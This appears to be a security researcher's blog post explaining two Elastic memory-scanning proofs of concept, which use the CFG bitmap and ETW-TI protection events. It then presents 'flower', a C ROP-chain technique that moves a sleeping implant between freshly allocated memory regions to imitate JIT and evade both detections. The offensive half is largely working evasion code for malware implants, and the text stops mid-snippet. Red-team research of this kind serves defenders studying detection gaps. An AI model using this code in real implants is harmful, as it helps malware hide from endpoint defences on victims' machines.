naively bypassing new memory scanning POCs

prelude

This is the blogpost adding more insight to my talk I gave at university. I went down several rabbitholes when it comes to in memory evasion, both from an offensive and defensive perspective. I hope it will give others more ideas as there is many more things to uncover about this subject. More things about this subject soon TM.

The technique presented here is rather primitive and if anything, very silly; this does prove one thing, even the more cutting edge and scaleable detections can be juked very easily.

Only by defenders and attackers working together will this field keep moving forward.

TOC

intro

Sleep obfuscation has now become a core component of modern implants, allowing an implant to conceal itself at rest and thus hide some if not most in-memory IOCs which can be hunted for with modern memory scanners (cf Moneta and PE-Sieve)

However in recent months, new ways to find those concealed implants have been discussed at BLACKHAT ASIA 2023 by John Uhlmann (aka jdu2600) a security engineer specializing in scalable Windows in-memory malware detection @ ELASTIC. It is worth noting that some of the research was uncovered by Gabriel Landeau, a “WinDbg’er” @ ELASTIC.

These new ways tackle the in-memory threat detection problem by leveraging two already existing components in the Windows operating system, they also fortunately address every public sleep obfuscation implementation rendering them insufficient by themselves.

you can run but you can’t hide

3 POCs were published following the talk, but only two here are really relevant for us, I mean no offense to the one of a kind work of Mr Uhlmann, Mr Landeau and ELASTIC as a whole when saying this and I firstly invite you to go watch his talk on youtube.com and give his POCs a quick read on GitHub, kindly.

The two POCs are:

  1. CFG-FindHiddenShellcode which uses the CFG bitmap
  2. EtwTi-FluctuationMonitor which leverages the immutable page principle

ELASTIC moving crazy

What’s so special about them ? Coupled together they can detect beloved and commonly used implementations of Ekko/Zilean, FOLIAGE, Gargoyle, … pretty accurately and with minimal overhead (no “who up callin RtlCreateTimer/NtQueueApcThread ?”).

The scope of this blogpost will be to prove that it is in fact possible to address those two rather new detections in a rather silly way (I will talk about a sane way but it’s not as silly >:[ ), I won’t spend too much time talking about how current sleep obfuscation techniques work in-depth or why it is very important (since it’s not exactly new and I am trying to keep the blogpost concise). I will instead recommend you watch Kyle Avery’s excellent talk on the matter if you are not up to speed already.

Unbeknownst to ELASTIC and Mr Uhlmann, I can run AND hide.

CFG-FindHiddenShellcode

So the first POC that caught my attention was CFG-FindHiddenShellcode. It leverages the CFG bitmap to find previously executable regions, which comes in handy when you want to find concealed implants, which at rest, will appear as ~X

But how ? why ? and what is even the CFG ?

wat da hell is CFG

Control Flow Guard is an exploit mitigation introduced in KB3000850 (November of 2014), it prevents the redirection of control flow to unexpected locations. This is achieved by the compiler inserting CFG instrumentation to the code, tightly restricting where indirect calls can execute.

goofy CFG pseudocode

__guard_check_icall_fptr will at runtime call ntdll!LdrpValidateUserCallTarget

CFG is known to be a pain in the case of sleep obfuscation due to most techniques (EKKO/ZILEAN/FOLIAGE/…) doing indirect calls through NtContinue, and can be a pain in general, even in legit (but usually old or lazy) software; It is thereby possible to actually add exceptions/valid targets so your process doesn’t blow up as shown here:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# credits @C5pider (havoc) 

/*!
 * @brief
 *  add module + function to CFG exception list.
 *
 * @param ImageBase
 * @param Function
 */
VOID CfgAddressAdd(
    IN PVOID ImageBase,
    IN PVOID Function
) {
    CFG_CALL_TARGET_INFO Cfg      = { 0 };
    MEMORY_RANGE_ENTRY   MemRange = { 0 };
    VM_INFORMATION       VmInfo   = { 0 };
    PIMAGE_NT_HEADERS    NtHeader = { 0 };
    ULONG                Output   = 0;
    NTSTATUS             NtStatus = STATUS_SUCCESS;

    NtHeader                = C_PTR( ImageBase + ( ( PIMAGE_DOS_HEADER ) ImageBase )->e_lfanew );
    MemRange.NumberOfBytes  = U_PTR( NtHeader->OptionalHeader.SizeOfImage + 0x1000 - 1 ) &~( 0x1000 - 1 );
    MemRange.VirtualAddress = ImageBase;

    /* set cfg target call info */
    Cfg.Flags  = CFG_CALL_TARGET_VALID;
    Cfg.Offset = Function - ImageBase;

    VmInfo.dwNumberOfOffsets = 1;
    VmInfo.plOutput          = &Output;
    VmInfo.ptOffsets         = &Cfg;
    VmInfo.pMustBeZero       = FALSE;
    VmInfo.pMoarZero         = FALSE;

    if ( ! NT_SUCCESS( NtStatus = SysNtSetInformationVirtualMemory( NtCurrentProcess(), VmCfgCallTargetInformation, 1, &MemRange, &VmInfo, sizeof( VmInfo ) ) ) ) {
        PRINTF( "NtSetInformationVirtualMemory Failed => %p", NtStatus );
    }
}

You normally would use the “SetProcessValidCallTargets” API, however I wanted to show this snippet for a more detailed explanation of how this would be achieved. Also it might sound counter intuitive that you can just add a valid indirect call target at will. However, for shellcode to actually add itself as a valid indirect call target it would require itself to somehow already be a valid target, considering you would need code execution. In layman terms this is a typical chicken and egg problem.

This way, additional memory ranges can be marked as valid in the eyes of CFG. But how does it keep track of those ?

bits and maps

CFG uses a bitmap to keep track of valid targets, where a set bit indicates that the address is a valid indirect call target. This bitmap is mapped in CFG enabled processes when they are created; Once mapped, the OS will store the address of said bitmap at ntdll!LdrSystemDllInitBlock + 0x60 and its size at ntdll!LdrSystemDllInitBlock + 0x68. Before an indirect call, ntdll!LdrpValidateUserCallTarget is called to verify the target address at runtime.

It would be good to note that the CFG bitmap is PAGE_READONLY and that trying to tamper with it upfront would be a very poor way to go about things.

ntdll!LdrpValidateUserCallTarget (called by __guard_check_icall_fptr in our CFG instrumented binary) tests a bit of the CFG bitmap that corresponds to the target address.

As explained by Zhang Yunhai the following is how the bitmap is tested:

-  Extract the highest 24 bit of the target address to form an index
-  Fetch a 32-bit DWORD from the CFG Bitmap using the index
-  Extract the 4th to 8th bits of the target address to form an offset n
-  Set the lowest bit of offset n if the target address is not 0x10 aligned
-  Test the nth bit of the 32-bit DWORD

If the bit isn’t set, then the target address is invalid; In this case, ntdll!RtlpHandleInvalidUserCallTarget is called, which raises interrupt 0x29 (__fastfail) unless specific conditions are met, including:

where ?

This bitmap is stored in PS_DLL_INIT_BLOCK.CfgBitMap however the way it’s fetched in the POC circumvents the fact that the structure itself is not documented and that its offset has changed previously

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
PVOID GetCfgBitmapPointer()
{
    PVOID pCfgBitmap = NULL;

    // PS_SYSTEM_DLL_INIT_BLOCK is exported from ntdll as LdrSystemDllInitBlock, but the structure itself is not documented
    // and the offset has changed previously.
    // We could hardcode offsets, or bruteforce this block looking for a pointer that matches the expected 2TB MEM_MAPPED
    // region characteristics.
    // However, the first instruction of LdrControlFlowGuardEnforced is usually -
    //   48 83 xx xx xx xx 00 00  cmp PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap, 0
    // So we can calculate the absolute address from the rel32 offset in this instruction.
    PVOID pLdrControlFlowGuardEnforced = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrControlFlowGuardEnforced");
    if (!pLdrControlFlowGuardEnforced)
        return NULL;

    PUCHAR Rip = (PUCHAR)pLdrControlFlowGuardEnforced + 8;
    PDWORD pRipRelativeOffset = (PDWORD)((PUCHAR)pLdrControlFlowGuardEnforced + 3);
    DWORD RipRelativeOffset = 0;
    SIZE_T szBytesRead = 0;
    if (!ReadProcessMemory(GetCurrentProcess(), pRipRelativeOffset, &RipRelativeOffset, sizeof(RipRelativeOffset), &szBytesRead))
        return NULL;

    return Rip + RipRelativeOffset;
}

The reason why the author reads the memory of our own process is due to how ASLR and known DLLs (which uses COW) behave. PS_SYSTEM_DLL_INIT_BLOCK.CfgBitmap lives in ntdll.dll which is a known DLL, thus we’ll find this pointer to the CFG bitmap to live at the same address in every usermode process. So getting the pointer address in our process or a remote one doesn’t really matter; what matters is which address space we’re querying.

bitmap behavior

*Protect and *Alloc functions will by default treat a specified region of PAGE_EXECUTE + MEM_COMMIT pages as valid indirect call targets, this in turn updating the bitmap; although, it is possible to override this behavior by specifying PAGE_TARGETS_INVALID when calling *Alloc functions or PAGE_TARGETS_NO_UPDATE when calling *Protect functions (when changing the protection to *X).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
/*
EXTRACT OF [https://learn.microsoft.com/en-us/windows/win32/memory/memory-protection-constants]


Constants > PAGE_TARGETS_NO_UPDATE

[...] The default behavior for VirtualProtect protection change to executable is to mark all locations as valid call targets for CFG.


Constants > PAGE_TARGETS_INVALID

Sets all locations in the pages as invalid targets for CFG. Used along with any execute page protection like PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY. 
Any indirect call to locations in those pages will fail CFG checks and the process will be terminated. 
The default behavior for executable pages allocated is to be marked valid call targets for CFG.
*/

The reason for this default behavior and why private executable memory in general is a thing is because of JIT, which we will talk about later on.

This means that when a committed memory region has it’s protection changed to X, the CFG bitmap will by default record the region as a valid indirect call target (unless specified otherwise as told previously), however the bitmap WILL NOT be updated when the protection is toggled to ~X, as once the region was marked as a valid indirect call target, no matter it’s next protections, this mark remains; see where we going ??

the blessed side-effect

Now that we know how the bitmap acts, the following can be established:

“The CFG bitmap, as an unintended side-effect, will record the location of every private memory region that are or were previously executable during the lifetime of the process”

This is actually a very powerful side-effect because, considering a beacon at rest will appear as ~X when performing sleep obfuscation, it is possible, through the bitmap, to know if it was previously executable, this effectively making concealed beacons stand out in most host processes.

This “side-effect” is what CFG-FindHiddenShellcode harnesses to uncover “hidden” pages (pages that were previously executable but now aren’t), if it were to be chained in a detection pipeline it would certainly help when it comes to triaging processes worth scanning. It also is cheap enough performance wise.

We can see the CFG bitmap being used in action to find hidden pages in the main source file. As said previously, the pointer lives at the same location in every process however we only care about reading what it points to in the relevant processes.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
PULONG_PTR GetCfgBitmap(HANDLE hProcess)
{
    static PVOID ppCfgBitmap = GetCfgBitmapPointer();
    PULONG_PTR pCfgBitmap = NULL;
    MEMORY_BASIC_INFORMATION mbi{};
    SIZE_T szBytesRead = 0;
    if (!ppCfgBitmap ||
        !ReadProcessMemory(hProcess, ppCfgBitmap, &pCfgBitmap, sizeof(pCfgBitmap), &szBytesRead) ||
        (0 == pCfgBitmap) ||
        !VirtualQueryEx(hProcess, pCfgBitmap, &mbi, sizeof(mbi)))
    {
        return NULL;
    }

    // Quick sanity check that our CFG bitmap pointer is the base of a MEM_MAPPED allocation.
    // We could also validate that it is 2TB in size.
    if ((mbi.AllocationBase != pCfgBitmap) || (MEM_MAPPED != mbi.Type))
    {
        printf("%p PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap = %p is invalid\n", ppCfgBitmap, pCfgBitmap);
        pCfgBitmap = NULL;
    }

    return pCfgBitmap;
}

Once the CFG bitmap of a process of interest is retrieved, the author queries it’s address space in search of MEM_COMMIT pages and when said pages are found, it’s going to query the bitmap with an index shift of 9

1
2
3
4
5
6
7
8
9
	    ULONG_PTR vaRegionEnd = va + mbiCfg.RegionSize * 64;
            while (va < vaRegionEnd)
            {
                pCfgEntry = pCfgBitMap + ((ULONG_PTR)va >> CFG_INDEX_SHIFT);
                SIZE_T stBytesRead = 0;
                ULONG_PTR ulEntry = 0;
                // TODO(jdu) This per-entry read is inefficient - just read the whole region upfront instead.
                if (!ReadProcessMemory(hProcess, pCfgEntry, &ulEntry, sizeof(ulEntry), &stBytesRead))
                    break;

Each CFG bitmap page equals to 64 VA pages

The main detection mechanism is a bit later in the code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
		if ((hiddenRegionSize > 0) && ((MAXULONG_PTR != ulEntry) || (va == vaRegionEnd)))
                {
                    // The CFG bitmap indicates that this region has been executable during the lifetime
                    // of the process. Now check the VAD tree.

                    MEMORY_BASIC_INFORMATION mbiStart{};
                    MEMORY_BASIC_INFORMATION mbiEnd{};
                    if (VirtualQueryEx(hProcess, (PVOID)hiddenRegionStart, &mbiStart, sizeof(mbi)) &&
                        (MEM_COMMIT == mbiStart.State) &&
                        VirtualQueryEx(hProcess, (PVOID)(hiddenRegionStart + hiddenRegionSize - 1), &mbiEnd, sizeof(mbi)))
                    {
                        // Is this region non-executable in the VAD tree?
                        bool bHiddenRegion = !(PAGE_EXECUTE_FLAGS & mbiStart.Protect) &&
                            !(PAGE_EXECUTE_FLAGS & mbiStart.AllocationProtect);

                        // Handle a few common (likely) false positives.
                        bool bLikelyFalsePositive = 
                            (mbiStart.AllocationBase != mbiEnd.AllocationBase) || // hidden region overlaps allocation
                            (hiddenRegionSize == 0x3000);                         // 12K region
                        
                        if (bHiddenRegion && (bAggressive || !bLikelyFalsePositive))
                        {
                            result.push_back((PVOID)(hiddenRegionStart));
                        }
                    }

                    hiddenRegionStart = 0;
                    hiddenRegionSize = 0;
                }

Since the CFG bitmaps indicates that the region has been executable at some point, the author queries the region of interest. If according to the VAD (Virtual Address Descriptor), the region isn’t executable as seen in the bHiddenRegion bool:

1
2
3
4
5
constexpr auto PAGE_EXECUTE_FLAGS = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY;
[...]
                        // Is this region non-executable in the VAD tree?
                        bool bHiddenRegion = !(PAGE_EXECUTE_FLAGS & mbiStart.Protect) &&
                            !(PAGE_EXECUTE_FLAGS & mbiStart.AllocationProtect);

Then the region is considered as “hidden” because although the CFG bitmap clearly states that said region was previously executable, it now isn’t. Thus the hidden region is saved to our results vector.

1
2
3
4
                        if (bHiddenRegion && (bAggressive || !bLikelyFalsePositive))
                        {
                            result.push_back((PVOID)(hiddenRegionStart));
                        }

It’s worth noting that jdu2600 still makes sure to account for false positives,

1
2
3
4
                        // Handle a few common (likely) false positives.
                        bool bLikelyFalsePositive = 
                            (mbiStart.AllocationBase != mbiEnd.AllocationBase) || // hidden region overlaps allocation
                            (hiddenRegionSize == 0x3000);                         // 12K region

This logic is repeated for every VA in the process (whilst still making sure we dont go over vaRegionEnd)

1
va += mbiCfg.RegionSize * 64; // Each CFG BitMap page corresponds to 64 VA pages

This is an efficient, low overhead, scaleable and pretty sneaky detection

EtwTi-FluctuationMonitor

This is the second POC that caught my attention and it’s, in my silly opinion, the nastiest of the two because it goes to show how OP ETW-TI is as a technology for defenders.

I should mention you could remove the talking stick privilege from ETW-TI in windows 10 and some versions of windows 11 etw-bye.cpp

the immutable page principle

This section will be extremely short because it’s something that just makes sense if you think about it

As said by jdu2600

It is security best practice that once a page is marked executable it should be immutable That is the memory protection progression for code pages should only be RW to RX

TL;DR non executable memory made executable shouldn’t evolve beyond that point, apart from being freed, the same can be applied for writable

what about JIT

Private memory being made executable and then executed is actually not a direct sign of something suspicious going on as that’s how JIT behaves. However, JIT (Just in time) compilers just like AOT compilers (Ahead of time) only compile once.

It’s important to note that some JIT engines reuse allocations (I think .NET reuses them ?) and there is also legitimate API hooking to account for (for instance Discord will inject a hook to record your screen when you’re streaming)

As explained in the POC itself, fluctuation is still wildly different from JIT/AOT

1
2
3
4
5
6
// The set of all of the code pages in a process that have transitions from writable to non-writable, 
// or from executable to non-executable. In both cases, these code pages should never be modified again.
// Proper JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]
// YOLO JIT: Allocate(RWX) -> memcpy(code) -> execute
// Bad JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute -> Protect(RW) -> re-use for new code
// Fluctuation: ... -> Protect(RX) -> execute -> Protect(~X) [-> encrypt] -> Protect(RX) -> ...

ETW who ?

ETW-TI is a kernel mode technology allowing the generation of events upon security-critical operations, including but not limited to executable memory creation but also memory protection changes

This event feed produced by EtwTi* functions embedded in the relevant kernel functions can only be consumed by security products, which need to be protected (PROTECTED_ANTIMALWARE_LIGHT) and thus required to be signed as such by Microsoft.

A list of all the events (at least on my system) can be found below

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# logman query providers Microsoft-Windows-Threat-Intelligence

Provider                                 GUID
-------------------------------------------------------------------------------
Microsoft-Windows-Threat-Intelligence    {F4E1897C-BB5D-5668-F1D8-040F4D8DD344}

Value               Keyword              Description
-------------------------------------------------------------------------------
0x0000000000000001  KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL
0x0000000000000002  KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL_KERNEL_CALLER
0x0000000000000004  KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE
0x0000000000000008  KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE_KERNEL_CALLER
0x0000000000000010  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL
0x0000000000000020  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER
0x0000000000000040  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE
0x0000000000000080  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER
0x0000000000000100  KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL
0x0000000000000200  KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL_KERNEL_CALLER
0x0000000000000400  KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE
0x0000000000000800  KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE_KERNEL_CALLER
0x0000000000001000  KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE
0x0000000000002000  KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE_KERNEL_CALLER
0x0000000000004000  KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE
0x0000000000008000  KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE_KERNEL_CALLER
0x0000000000010000  KERNEL_THREATINT_KEYWORD_READVM_LOCAL
0x0000000000020000  KERNEL_THREATINT_KEYWORD_READVM_REMOTE
0x0000000000040000  KERNEL_THREATINT_KEYWORD_WRITEVM_LOCAL
0x0000000000080000  KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE
0x0000000000100000  KERNEL_THREATINT_KEYWORD_SUSPEND_THREAD
0x0000000000200000  KERNEL_THREATINT_KEYWORD_RESUME_THREAD
0x0000000000400000  KERNEL_THREATINT_KEYWORD_SUSPEND_PROCESS
0x0000000000800000  KERNEL_THREATINT_KEYWORD_RESUME_PROCESS
0x0000000001000000  KERNEL_THREATINT_KEYWORD_FREEZE_PROCESS
0x0000000002000000  KERNEL_THREATINT_KEYWORD_THAW_PROCESS
0x0000000004000000  KERNEL_THREATINT_KEYWORD_CONTEXT_PARSE
0x0000000008000000  KERNEL_THREATINT_KEYWORD_EXECUTION_ADDRESS_VAD_PROBE
0x0000000010000000  KERNEL_THREATINT_KEYWORD_EXECUTION_ADDRESS_MMF_NAME_PROBE
0x0000000020000000  KERNEL_THREATINT_KEYWORD_READWRITEVM_NO_SIGNATURE_RESTRICTION
0x0000000040000000  KERNEL_THREATINT_KEYWORD_DRIVER_EVENTS
0x0000000080000000  KERNEL_THREATINT_KEYWORD_DEVICE_EVENTS
0x0000000100000000  KERNEL_THREATINT_KEYWORD_READVM_REMOTE_FILL_VAD
0x0000000200000000  KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE_FILL_VAD
0x0000000400000000  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_FILL_VAD
0x0000000800000000  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER_FILL_VAD
0x0000001000000000  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_FILL_VAD
0x0000002000000000  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER_FILL_VAD
0x8000000000000000  Microsoft-Windows-Threat-Intelligence/Analytic

Value               Level                Description
-------------------------------------------------------------------------------
0x04                win:Informational    Information

PID                 Image
-------------------------------------------------------------------------------
0x00000000

In the case of EtwTi-FluctuationMonitor the event being leveraged is KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL as seen in the first lines of the POC

1
2
3
4
5
6
int wmain(int, wchar_t**) {
    printf("[*] Enabling Microsoft-Windows-Threat-Intelligence (KEYWORD_PROTECTVM_LOCAL)\n");
    krabs::provider<> ti_provider(L"Microsoft-Windows-Threat-Intelligence");
    ti_provider.any(0x10); // KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL

    krabs::event_filter protectvm_filter(krabs::predicates::id_is(7));

This event occurs when a *Protect function is called, with it some information is emitted such as:

The information of the event is then parsed

1
2
3
4
5
6
7
8
 auto protectvm_cb = [](const EVENT_RECORD& record, const krabs::trace_context& trace_context) {
        krabs::schema schema(record, trace_context.schema_locator);
        krabs::parser parser(schema);
        
        auto ProcessID          = parser.parse<DWORD>(L"CallingProcessId");
        auto BaseAddress        = parser.parse<PVOID>(L"BaseAddress");
        auto ProtectionMask     = parser.parse<DWORD>(L"ProtectionMask");
        auto LastProtectionMask = parser.parse<DWORD>(L"LastProtectionMask");

Then using ProtectionMask and LastProtectionMask we can see the implementation of the immutable page principle in action.

1
2
if ((!IsExecutable(LastProtectionMask) && IsExecutable(ProtectionMask)) ||
            (IsWritable(LastProtectionMask) && !IsWritable(ProtectionMask)))

Once a writeable page is made unwriteable or an unexecutable page is made executable, said pages are recorded as now being immutable.

1
 g_ImmutableCodePages[ProcessID].insert(BaseAddress);

However if the page already was immutable then an alert is raised

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
	    auto immutable_iter = g_ImmutableCodePages.find(ProcessID);
            if (immutable_iter != g_ImmutableCodePages.cend() &&
                immutable_iter->second.find(BaseAddress) != immutable_iter->second.cend())
            {
                // An immutable code page has been potentially modfied.

                CONSOLE_SCREEN_BUFFER_INFO console_info{};
                static auto hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE);
                GetConsoleScreenBufferInfo(hStdOutput, &console_info);
                SetConsoleTextAttribute(hStdOutput, RED);
                printf("[!] %S %p is fluctuating\n", ProcessName(ProcessID).c_str(), BaseAddress);
                SetConsoleTextAttribute(hStdOutput, console_info.wAttributes);
            }

Since it’s a POC it just gives a nice although a bit scary warning, but this could be used to alert on or even triage processes worth investigating for further analysis.

the silly overlap

There is some kind of overlap (understandably) between those two POCs, where we need to avoid fluctuating and thus break the chain between each RW->RX toggle. Ironically EtwTi-FluctuationMonitor had the answer for us all this time.

1
2
3
4
// Proper JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]
// YOLO JIT: Allocate(RWX) -> memcpy(code) -> execute
// Bad JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute -> Protect(RW) -> re-use for new code
// Fluctuation: ... -> Protect(RX) -> execute -> Protect(~X) [-> encrypt] -> Protect(RX) -> ...

We just need to behave like “proper” JIT (I am following their definitions) and we’ll be fine. Optionally and as always we could just stay in a .NET RWX JIT region and chill there, simple and works, on top of being less suspicious than “mockingjay” by a mile; but eh that’s a bit boring isn’t it ?

the silly solution

The solution presented here is stupid but works; does that mean the detections are stupid ? Yes No, but it goes to show how attackers can masquerade as legit behavior, even if in a stupid way, to slip through detections.

the modified ropchain

By making our beacon move itself in memory we can simulate JIT behavior and slip through an honest gap in those detections.

I say JIT, I am aware it’s a dollar store version of it; I am only calling it this because it’s the very behavior that the aforementionned POCs have to account for to not have too many FPs

The following allows this:

This ropchain logic I codename flower

This allows to slip through CFG-FindHiddenShellcode as the “new region” isn’t previously executable and thus does not count as an hidden page and EtwTi-FluctuationMonitor since it looks like we are doing “proper” JIT ( RW->memcpy->RX->FREE )

we’re so back !

allocation from the dollar store

To flow through memory, we try to allocate a new region at a given offset from ourselves in memory. It’s worth noting you could totally omit this and just allocate a new region and ball. We do this simply to avoid going in a region where we were previously, not that I think it would matter.

TL;DR: cuz i can and i will

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
FUNC PVOID FwpMemPrepare(  
        _In_ PFLOWER_CTX Ctx,  
        _In_ ULONG Size  
) {  
    PVOID Memory    = { 0 };  
    ULONG Offset    = FW_BASE_OFS;  
    ULONG Prot      = PAGE_READWRITE;  
  
  
    //  
    // try allocating a new region till we are successful    
    // if an allocation fails, increment the base offset from    
    // the shellcode base by ShiftOfs    
    //    
    PRINTF( "[FLOWER] [*] Trying to allocate NxtBuf @ %p\n", C_PTR( U_PTR( SHC_START() ) + Offset ) );  
    while ( TRUE ) {  
        if ( ! ( Memory = Ctx->Win32.VirtualAlloc(  
                C_PTR( U_PTR( SHC_START() ) + Offset ),  
                Size,  
                ( MEM_COMMIT | MEM_RESERVE ),  
                Prot  
        ) ) ) {  
            Offset += FW_SHIFT_OFS;  
            continue;  
        }  
        PRINTF( "[FLOWER] [*] NxtBuf allocated @ %p\n", Memory );  
        break;  
    }  
  
    return Memory;  
}

the “ropchain”

For demonstration purposes and to show this technique just works we’ll make a helper function that generates an array of CONTEXT structs so you can use them with EKKO/ZILEAN/FOLIAGE/… (also because it’s surprisingly easier to write and understand)

The signature of the function is the following

1
2
3
4
5
6
7
8
9
FUNC NTSTATUS FwRopChain(  
        _In_  PFLOWER_CTX   Ctx,  
        _In_  ULONG         Delay,  
        _In_  PCONTEXT      RopInit,  
        _In_  PVOID         NxtBuf,  
        _In_  ULONG         Flags,  
        _Out_ PCONTEXT*     Rop,  
        _Out_ SIZE_T*       RopLen  
)

I won’t really delve and explain each parameter as the comments in the project itself should get you going.

Also, because it’s just easier we allocate our CONTEXT structs on the heap, we will probably not use all of them buuuut that does not matter as we can just free them once we crafted the ropchain

1
2
3
4
5
6
7
8
//  
// allocate FLOWER_MAX_LEN CONTEXTs on the heap  
// we will probably not use all of them but easier like this  
//  
if ( ! NT_SUCCESS( Status = FwpRopAlloc( Ctx, Rop ) ) ) {  
    PRINTF( "[FLOWER] [-] FwpRopAlloc failed [Status: 0x%lx]\n", Status );  
    goto LEAVE;  
}

Once that’s done we can start tinkering with the ropchain itself.

1
2
3
4
5
OBF_JMP( Inc, Ctx->Win32.WaitForSingleObjectEx );  
Rop[ Inc ]->Rcx = U_PTR( Ctx->Evnts.Start );  
Rop[ Inc ]->Rdx = U_PTR( INFINITE );  
Rop[ Inc ]->R8  = U_PTR( FALSE );  
Inc++;

So far pretty classic, we just want to wait for the start event to be signaled.

OBF_JMP is just a macro to make the usage of JMP gadgets to hide the content of RIP easier and more malleable.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
//  
// https://github.com/HavocFramework/Havoc/blob/main/payloads/Demon/include/core/SleepObf.h#L16  
//  
#define OBF_JMP( i, p )                                \  
    if ( Flags & FLOWER_GADGET_RAX ) {                 \  
        Rop[ i ]->Rax = U_PTR( p );                    \  
    } if ( Flags & FLOWER_GADGET_RDI ) {               \  
        Rop[ i ]->Rdi = U_PTR( p );                    \  
    } else {                                           \  
        Rop[ i ]->Rip = U_PTR( p );                    \  
    }

Next we want to move ourselves to the new region (duh), this can be achieved with RtlMoveMemory/RtlCopyMemory or literally any functions that allow you to write a buffer somewhere.

1
2
3
4
5
6
7
8
9
//  
// copy ourselves to the new region  
// NOTE: can use RtlCopyMemory or literally any write function  
//  
OBF_JMP( Inc, Ctx->Win32.RtlMoveMemory )  
Rop[ Inc ]->Rcx = U_PTR( NxtBuf );  
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcBase );  
Rop[ Inc ]->R8  = U_PTR( Ctx->ShcLength );  
Inc++;

If it wasn't clear yet, **NxtBuf** is a pointer to our "new" memory region

Obviously to avoid hoarding memory we should free the old region

1
2
3
4
5
OBF_JMP( Inc, Ctx->Win32.VirtualFree )  
Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );  
Rop[ Inc ]->Rdx = U_PTR( 0 );  
Rop[ Inc ]->R8  = U_PTR( MEM_RELEASE );  
Inc++;

Optionally we zero out the old copy before freeing the region, this does flip RX to RW however EtwTi-FluctuationMonitor doesn’t seem to be screaming at this (possible oversight ?) and the time spent as a “hidden page” is so minimal we might aswell disregard it, hence why I included this option

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
if ( Flags & FLOWER_ZERO_PROTECT ) {  
    OBF_JMP( Inc, Ctx->Win32.VirtualProtect )  
    Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );  
    Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );  
    Rop[ Inc ]->R8  = U_PTR( PAGE_READWRITE );  
    Rop[ Inc ]->R9  = U_PTR( &Tmp );  
    Inc++;  

  
    OBF_JMP( Inc, Ctx->Win32.RtlZeroMemory )  
    Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );  
    Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );  
    Inc++;  
}

Zeroing out the old region by reallocating over it as RW, zeroing it then freeing it again will be left as an exercise to the reader

Then we can do stuff like masking our stack, encrypting etc; do remember that NxtBuf is still PAGE_READWRITE here

Of course let’s not forget to sleep else we are running but not hiding :P

1
2
3
4
5
6
7
8
9
//
// could totally use NtDelayExecution etc
// feel free to change
//
OBF_JMP( Inc, Ctx->Win32.WaitForSingleObjectEx )  
Rop[ Inc ]->Rcx = U_PTR( NtCurrentProcess() );  
Rop[ Inc ]->Rdx = U_PTR( Delay );  
Rop[ Inc ]->R8  = U_PTR( FALSE );  
Inc++;

Once we are done sleeping we just need to toggle NxtBuf to RX (and signal the end of the ropchain)

1
2
3
4
5
6
OBF_JMP( Inc, Ctx->Win32.VirtualProtect )  
Rop[ Inc ]->Rcx = U_PTR( NxtBuf );  
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );  
Rop[ Inc ]->R8  = U_PTR( PAGE_EXECUTE_READ );  
